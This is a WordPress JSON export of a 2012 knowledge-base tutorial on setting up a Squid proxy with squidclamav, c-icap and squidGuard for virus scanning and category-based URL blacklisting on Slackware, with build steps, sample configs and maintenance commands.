{"id":188,"date":"2012-03-02T10:49:50","date_gmt":"2012-03-02T02:49:50","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=188"},"modified":"2012-03-03T13:11:58","modified_gmt":"2012-03-03T05:11:58","slug":"squidclamav-squidguard","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/03\/02\/squidclamav-squidguard\/","title":{"rendered":"Squidclamav &#038; SquidGuard"},"content":{"rendered":"<p>This post will guide you to set up an anti-virus and URL filtering proxy.<br \/>\n<!--more--><br \/>\nOS: Slackware 13.37<br \/>\nSoftware: squidclamav 6.5, squidGuard 1.5-beta, c-icap 0.1.7<\/p>\n<h1>Required software components<\/h1>\n<ul>\n<li><a href=\"http:\/\/squidclamav.darold.net\/\">squidclamav<\/a> &#8211; anti-virus<\/li>\n<li><a href=\"http:\/\/www.squidguard.org\/\">squidGuard<\/a> &#8211; URL filtering<\/li>\n<li><a href=\"http:\/\/c-icap.sourceforge.net\/\">c-icap<\/a><\/li>\n<li><a href=\"http:\/\/www.clamav.net\">clamav<\/a> &#8211; virus scanning<\/li>\n<\/ul>\n<h1>Installation<\/h1>\n<ul>\n<li>c-icap\n<pre>\r\n.\/configure --prefix=\/usr\/local\/c-icap --enable-large-files\r\nmake\r\nmake install\r\n\r\nmkdir -p \/usr\/local\/c-icap\/var\/run\r\nmkdir \/usr\/local\/c-icap\/var\/log\r\nchown -R nobody:nobody \/usr\/local\/c-icap\/var\r\n<\/pre>\n<\/li>\n<li>squidclamav\n<ul>\n<li>modify the config file path in the source file src\/squidclamav.h,\n<pre>\r\n#define CONFIG_FILE \"\/usr\/local\/squidclamav\/etc\/squidclamav.conf\"\r\n<\/pre>\n<pre>\r\n.\/configure --prefix=\/usr\/local\/squidclamav --with-c-icap=\/usr\/local\/c-icap\/\r\nmake\r\nmake install\r\n<\/pre>\n<\/li>\n<li>squidclamav.so is installed to \/usr\/local\/c-icap\/lib\/c_icap\/squidclamav.so<\/li>\n<\/ul>\n<\/li>\n<li>squidGuard\n<pre>\r\n.\/configure --prefix=\/usr\/local\/squidGuard --with-squiduser=nobody\r\nmake\r\nmake install\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Configuration<\/h1>\n<ul>\n<li>based on <strong>\/usr\/local\/c-icap\/etc\/c-icap.conf<\/strong>, you 
may take the following options as reference,\n<pre>\r\nPidFile \/usr\/local\/c-icap\/var\/run\/c-icap.pid\r\nCommandsSocket \/usr\/local\/c-icap\/var\/run\/c-icap.ctl\r\nUser nobody\r\nGroup nobody\r\nServerAdmin you@your.address\r\nServerName YourServerName\r\n#Service echo srv_echo.so  #(uncomment)\r\n<\/pre>\n<\/li>\n<li><strong>\/usr\/local\/squidclamav\/etc\/squidclamav.conf<\/strong>, you may take the following options as reference,\n<pre>\r\nclamd_local \/usr\/local\/clamav\/var\/run\/clamd.socket\r\nlogredir 1\r\ndnslookup 0\r\n<\/pre>\n<\/li>\n<li><strong>\/usr\/local\/squid\/etc\/squid.conf<\/strong>, add\n<pre>\r\nacl POST method POST\r\nicap_enable on\r\nicap_send_client_ip on\r\nicap_send_client_username on\r\nicap_client_username_encode off\r\nicap_client_username_header X-Authenticated-User \r\nicap_preview_enable on\r\nicap_preview_size 1024\r\nicap_service service_req reqmod_precache bypass=1 icap:\/\/127.0.0.1:1344\/squidclamav\r\nadaptation_access service_req deny POST\r\nadaptation_access service_req allow all\r\nicap_service service_resp respmod_precache bypass=1 icap:\/\/127.0.0.1:1344\/squidclamav\r\nadaptation_access service_resp deny POST\r\nadaptation_access service_resp allow all\r\n\r\nurl_rewrite_program \/usr\/local\/squidGuard\/bin\/squidGuard\r\n<\/pre>\n<p><strong>It seems some sites have problems with POST requests when squidGuard is configured; the above setup will skip all POST requests to squidGuard.<\/strong><\/p>\n<\/li>\n<\/ul>\n<h1>Blacklists for squidGuard<\/h1>\n<p>The squidGuard site lists some <a href=\"http:\/\/www.squidguard.org\/blacklists.html\">blacklist providers<\/a>; you can download their lists and install them at your site to deny access to sites by category.<\/p>\n<ul>\n<li><strong>\/usr\/local\/squidGuard\/squidGuard.conf<\/strong>\n<ul>\n<li>general options: define the blacklist DB and the log path\n<pre>\r\ndbhome \/usr\/local\/squidGuard\/db\r\nlogdir \/usr\/local\/squidGuard\/log\r\n  
<\/pre>\n<\/li>\n<li>define the blacklist DB of the category\n<pre>\r\ndest phishing {\r\n  domainlist blacklists\/phishing\/domains\r\n  urllist blacklists\/phishing\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\n<\/pre>\n<\/li>\n<li>you may define your own whitelist\n<pre>\r\ndest whitelist {\r\n  domainlist whitelist\/domains\r\n  urllist whitelist\/urls\r\n}\r\n<\/pre>\n<\/li>\n<li>the ACL block\n<pre>\r\nacl {\r\n  default {\r\n    pass whitelist !phishing all\r\n    redirect http:\/\/yousite.com\/block.html\r\n  }\r\n}\r\n  <\/pre>\n<\/li>\n<li>putting it all together, a complete sample of <strong>squidGuard.conf<\/strong>\n<pre>\r\ndbhome \/usr\/local\/squidGuard\/db\r\nlogdir \/usr\/local\/squidGuard\/log\r\ndest whitelist {\r\n  domainlist whitelist\/domains\r\n  urllist whitelist\/urls\r\n}\r\ndest ownbl {\r\n  domainlist bl\/domains\r\n  urllist bl\/urls\r\n}\r\ndest ads {\r\n  domainlist blacklists\/ads\/domains\r\n  urllist blacklists\/ads\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest adv {\r\n  domainlist blacklists\/adv\/domains  \r\n  urllist blacklists\/adv\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest phishing {\r\n  domainlist blacklists\/phishing\/domains\r\n  urllist blacklists\/phishing\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\ndest spyware {\r\n  domainlist blacklists\/spyware\/domains\r\n  urllist blacklists\/spyware\/urls\r\n  log banned.log # optional to log blocked access in this category\r\n}\r\n\r\nacl {\r\n  default {\r\n    pass whitelist !ownbl !ads !adv !phishing !spyware all\r\n    redirect http:\/\/yourcompany.com\/block.html\r\n  }\r\n}\r\n  <\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<li>Whitelist &#8211; you can define whitelisted URLs in <strong>\/usr\/local\/squidGuard\/db\/whitelist\/urls<\/strong>\n<pre>\r\nfacebook.com\r\nq-station.net\r\n<\/pre>\n<\/li>\n<li>Install 3rd 
party blacklist &#8211; basically, you can download the tar archive from a provider and untar it to <strong>\/usr\/local\/squidGuard\/db<\/strong>; after untarring the archive, the directory structure should look like this:\n<pre>\r\nls -lR \/usr\/local\/squidGuard\/db\r\n\r\n\/usr\/local\/squidGuard\/db:\r\ndrwxr-xr-x  2 nobody nobody 4096 Mar  1 22:00 bl\/\r\ndrwxr-xr-x 99 nobody nobody 4096 Mar  2 05:26 blacklists\/\r\ndrwxr-xr-x  2 nobody nobody 4096 Mar  1 21:35 whitelist\/\r\n\r\n\/usr\/local\/squidGuard\/db\/bl:\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 22:00 domains\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 22:00 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists:\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 ads\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 adult\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 adv\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 aggressive\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 agressif\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 alcohol\/\r\ndrwxr-xr-x 2 nobody nobody 4096 Mar  2 05:26 anonvpn\/\r\n  :\r\n  :\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/ads:\r\ntotal 240\r\n-rw-r--r-- 1 nobody nobody  59204 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody   8349 Mar  2 05:26 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/adult:\r\ntotal 18592\r\n-rw-r--r-- 1 nobody nobody 17186368 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody  1851077 Mar  2 05:26 urls\r\n\r\n\/usr\/local\/squidGuard\/db\/blacklists\/adv:\r\ntotal 924\r\n-rw-r--r-- 1 nobody nobody 214657 Mar  2 05:26 domains\r\n-rw-r--r-- 1 nobody nobody  43991 Mar  2 05:26 urls\r\n\r\n    :\r\n    :\r\n\r\n\/usr\/local\/squidGuard\/db\/whitelist:\r\ntotal 20\r\n-rw-r--r-- 1 nobody nobody    0 Mar  1 21:34 domains\r\n-rw-r--r-- 1 nobody nobody   24 Mar  1 21:34 urls\r\n<\/pre>\n<\/li>\n<li>Compile the blacklist\n<pre>\r\n&gt; \/usr\/local\/squidGuard\/bin\/squidGuard -C all\r\n&gt; chown -R nobody:nobody 
\/usr\/local\/squidGuard\r\n<\/pre>\n<\/li>\n<\/ul>\n<h1>Starting everything<\/h1>\n<pre>\r\n\/usr\/local\/c-icap\/bin\/c-icap # start the ICAP service to enable virus scanning\r\n\/usr\/local\/squid\/sbin\/squid -k reconfigure # activate squidGuard by reconfiguring squid\r\n<\/pre>\n<h1>Post installation<\/h1>\n<ul>\n<li>log rotation\n<ul>\n<li><strong>\/etc\/logrotate.d\/c-icap<\/strong>\n<pre>\r\n\/usr\/local\/c-icap\/var\/log\/*log {\r\n     rotate 12\r\n     weekly\r\n     compress\r\n     delaycompress\r\n     postrotate\r\n     kill -HUP `cat \/usr\/local\/c-icap\/var\/run\/c-icap.pid`\r\n     endscript\r\n}\r\n <\/pre>\n<\/li>\n<li><strong>\/etc\/logrotate.d\/squidGuard<\/strong>\n<pre>\r\n\/usr\/local\/squidGuard\/log\/banned.log\r\n\/usr\/local\/squidGuard\/log\/squidGuard.log {\r\n  weekly\r\n  rotate 5\r\n  copytruncate\r\n  compress\r\n  notifempty\r\n  missingok\r\n}\r\n <\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h1>Maintenance<\/h1>\n<ul>\n<li>Updating squidclamav.conf &#8211; you can safely restart c-icap to make the system recognize the changes, or you can do the following using the ICAP control interface:\n<pre>\r\necho -n \"squidclamav:cfgreload\" > \/usr\/local\/c-icap\/var\/run\/c-icap.ctl\r\n<\/pre>\n<\/li>\n<li>Updating blacklists &#8211; when you download new blacklists, you should compile the lists with\n<pre>\r\n\/usr\/local\/squidGuard\/bin\/squidGuard -C all\r\n<\/pre>\n<\/li>\n<li>then make sure squidGuard can read the db\n<pre>\r\nchown -R nobody:nobody \/usr\/local\/squidGuard\/db\r\n<\/pre>\n<\/li>\n<li>make the new blacklist DB effective with\n<pre>\r\n\/usr\/local\/squid\/sbin\/squid -k reconfigure\r\n<\/pre>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>This post will guide you to set up an anti-virus and URL filtering proxy.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[37,38,39],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=188"}],"version-history":[{"count":32,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188\/revisions"}],"predecessor-version":[{"id":256,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/188\/revisions\/256"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=188"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=188"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=188"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}